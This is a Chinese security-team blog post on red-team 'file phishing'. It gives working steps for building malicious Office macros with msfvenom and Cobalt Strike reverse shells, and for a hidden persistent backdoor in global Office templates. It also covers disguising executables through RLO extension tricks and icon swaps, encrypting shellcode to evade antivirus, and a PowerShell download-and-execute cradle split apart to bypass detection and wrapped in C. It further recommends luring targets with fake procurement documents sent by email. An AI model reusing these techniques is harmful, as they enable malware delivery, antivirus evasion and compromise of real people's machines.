攻防演练对抗赛之初识文件钓鱼
2019-11-29 09:00:00 Author: mp.weixin.qq.com(查看原文) 阅读量:68 收藏

山东新潮信息

专业|专注|卓越|安全

声明:Tide安全团队原创文章,转载请声明出处!文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担!

*本文原创作者:诺言@TideSec,转载请申明出处。

今年参加了几次护网比赛,其它队伍依靠社工结合文件钓鱼得了不少分,自己之前并没有相关知识的积累,因此在这个方面吃了一些亏。

宏是微软公司为其OFFICE软件包设计的一个特殊功能,有着独特的文件后缀名,如:xlsm,docm,pptm等。

1、msf生成payload

msfvenom -p windows/meterpreter/reverse_tcp LHOST=ip地址 LPORT=端口 -f vba -o nouyan.vba

-f指定生成vba宏语言的攻击payload首先新建一个支持文件宏的office文件,以.docm进行演示。首先选择文件-选项-自定义功能区-开发工具。点击宏按钮,创建一个新的文件宏。把msf生成的宏代码复制到代码框中。保存文件,一个msf的反弹文件制作完成。msf开启监听。打开生成的1.docm文档。出现安全警告,提升宏被禁用,点击启用内容。成功上线。

二、cs生成payload

cs也支持生成office宏代码。选择一个监听器,直接复制代码到宏代码框中。上线成功。

实战

类似office宏还有一些其它利用方式,如DOCX文档远程模板注入执行宏,还可以通过shellcode进行免杀处理。在实战中,首先尽可能社工目标的各种信息,取得对方信任,根据钓鱼的目标,修改文档的名字,通过邮箱进行发送,如xx公司采购说明。

office宏钓鱼存在几大不适用性:

1、对方电脑未使用office。

2、office默认禁用宏,打开文件会进行提示。

3、独特的宏文件后缀,docm,xlsm等,容易引起他人怀疑。

4、免杀性要求较高。

全局宏建立持久性后门

office宏除了用于钓鱼,还可以用来建立隐蔽的持久性后门。新建一个宏,位置要选择所有活动模版和文档。在ThisDocument中写入宏代码,进行保存。成功建立了一个隐藏持久性后门,打开任意文档都可以触发宏代码,且杀软没有任何反应。

可执行exe文件

msf和cs都可以生成反弹木马,通过鼠标点击的方式进行触发。exe木马用于钓鱼,主要解决的问题有三个:

1 、后缀名隐藏

2、文件图标更换

3、文件免杀

后缀名隐藏

https://null-byte.wonderhowto.com/how-to/hide-virus-inside-fake-picture-0168183/

经典的“ .jpg.exe”

默认情况下,Windows隐藏已知的文件扩展名。

使用.scr扩展名

scr等同于exe后缀名。

Unitrix反转后缀

更改文件名为:重要资料xgpj.scr光标移动到g之前选择RLO反转。成功隐藏后缀。经过测试,使用.scr扩展名和Unitrix反转后缀会被360直接报毒。

文件图标更换

使用Restorator对exe文件进行图标更改。把木马文件和想要替换的目标exe都拖入到软件中。拖拽360图标到aaa.exe中,保存文件,成功替换图标。

文件免杀

介绍两种免杀姿势。

AVlator免杀

下载传送门一个后门生成器实用程序,它使用加密和注入技术来绕过杀软检测,并且自带了RTLO和更改图标功能。使用AES加密来加密给定的shellcode生成包含加密有效负载的可执行文件使用各种注入技术将shellcode解密并注入目标系统共有三个表单:分别存放用于加密shellcode的加密密钥的文本,AES加密的IV的文本和shellcode的文本。程序左方给出了在msf框架下的利用步骤。本次使用cs进行演示。

1、生成c#的payload2、保留16进制,使用notepad++去除空格3、复制到payload框中进行加密4、可以选择反转后缀(会被某些杀毒识别为恶意软件),替换图标,选择注入技术,成功生成文件。可以绕过大多数的杀软。本机完美绕过360动静态查杀。

powershell免杀

当前各大杀软对powershell的免杀能力都不强。

免杀思路:首先找到免杀的powershell payload,通过其它语言系统命令执行函数,调用powershell,最后打包成exe。使用cs自动生成的payload。

powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://x.x.x.x/'))"

接下来的目的是对执行的powershell语句进行免杀处理。很多思路和webshell的免杀相同,绕过关键字检测,需要自己动手去尝试,下面介绍一种powershell免杀。

关键字拆分免杀

拆分前:

powershell.exe "IEX ((new-object net.webclient).downloadstring('http://x.x.x.x/'))"

经过测试杀软检测downloadstring字符串,进行拆分。拆分后:

powershell.exe "$a1='IEX ((new-object net.webclient).downl';$a2='oadstring(''http://x.x.x.x''))';$a3="$a1,$a2";IEX(-join $a3)"

成功绕过杀软。对于对其它关键字的检测,都可以通过这种方法绕过。使用c语言的system函数去执行powershell。

#include
#include
int main(){
system("powershell.exe \"$a1='IEX ((new-object net.webclient).downl';$a2='oadstring(''http://x.x.x.x''))';$a3=\"$a1,$a2\";IEX(-join $a3)\"");
return 0;
}

编译成exe文件,180kb大小。大部分的杀软都不会报毒。运行后成功上线,会留下一个黑窗口。可以使用 -w hidden进行隐藏执行,但hidden会报毒,可以尝试下拆分hidden进行绕过。powershell能做的事情很多,比如免杀提权,更多的用法自行尝试。

总结

不管是宏文件还是钓鱼木马,一次成功的文件钓鱼离不开社会工程学,如何快速取得他人信任,才是难上之难。未解决的问题:绕过杀软隐藏真实文件后缀,如果大佬有思路的话可以联系我~

E

N

D

guān

zhù

wǒ

men

Tide20191WebIoT//

Tide: http://www.TideSec.com 


文章来源: http://mp.weixin.qq.com/s?__biz=Mzg2NTA4OTI5NA==&mid=2247484632&idx=1&sn=cca5b5536880ef123ea50d66ab58534d&chksm=ce5e26b9f929afaf0200e6371d0538d2aacc792bc3994d9ae493ea7b11cab05e4fc5bc30d0f8#rd
如有侵权请联系:admin#unsafe.sh